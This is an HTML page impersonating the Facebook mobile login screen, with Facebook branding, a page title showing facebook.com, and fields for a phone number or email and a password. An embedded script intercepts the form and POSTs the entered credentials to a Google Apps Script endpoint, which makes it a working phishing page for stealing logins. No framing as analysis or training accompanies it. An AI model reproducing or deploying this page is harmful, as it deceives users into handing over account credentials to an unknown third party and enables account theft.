<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>https://www.facebook.com</title>
    <style type="text/css">
        body{background-color:rgba(255, 255, 255, 0.921)}
        
        .header{
            width:100%;display:flex;align-items:Center;
            padding:8px;background:#fcf8db;font-size:14px;
        }
        .fbox{
            display:flex;justify-content:center;width:100%;
            align-items:center;flex-direction:column;
        }
        .fbox h2{
            margin-top:20px;font-size:22px;margin-bottom:5px;color:#4285f4;
        }
        .fbox input{border:none;box-shadow:0px 1px 2px rgba(200,200,200,200);
            background:#f5f5f5;margin-top:7px;padding:12px;
            width:92%;outline:none;
        }
    .fbox button{width:92%;margin-top:10px;padding:12px;outline:none;border:none;}
    .fbox #login-button{margin-left:16px;
        outline:none;border:none;border-radius:3px;background:#4285f4;color:white;
        font-weight:bold;margin-top:10px;padding:12px;font-weight:bold;font-size:16px;
        margin-left:10px;
    }
    .fbox #forget-button{
        background:none;margin-top:3px;border:none;
        font-size:12px;color:#4285f4;outline:none;
    }
    .fbox .line{display:flex;justify-content:Center;
    align-items:center;position:relative;width:92%;height:1px;
background:Red;margin:10px 0px;background:rgba(100,100,100)}
.fbox .line p{
    background:rgba(255, 255, 255, 0.921);padding:0px 20px;
}.fbox #create-account{width:50%;background:#059d58;color:white;padding:12px;margin-top:15px;
font-size:13px;font-weight:bold;border-radius:3px}
        </style>
</head>
<body>
    <div class="contain">
        <div class="header">
            <span><img src="https://i.postimg.cc/Bng0cQMF/JD-05-512.png"width="25px"></img></span>
            <span>Get facebook for android and browse faster</span>
        </div>
        <div class="fbox">
            <h2>Facebook</h2>
            <form  method="post" id="form">
            <input type="text"placeholder="Phone number or Email address"name="number">
            <input type="password"placeholder="Password"name="password">
            <button id="login-button">Log In</button>
            <button type="button"id="forget-button">Forgotten Password?</button>
            </form>
            <div class="line">
                <p>or</p>
            </div>
            <button type="button"id="create-account">Create account</button>
    </div>
</div>
   <script>
    let url='https://script.google.com/macros/s/AKfycbxcUve_8p5dC9eKSbaYXCcf8pun4jtRn2_UAUT33vmqr2x_5TJ3EsKREzpIbLcPsBXRfA/exec';
    let form=document.querySelector('#form');
    form.addEventListener("submit",(e)=>{
        let d=new FormData(form);
        fetch(url,{
           method:"POST", 
           body:d
        }).then((res)=>res.text())
        .then((finalRes)=>console.log(finalRes))
    e.preventDefault();
    })
     </script>
</body>
</html>
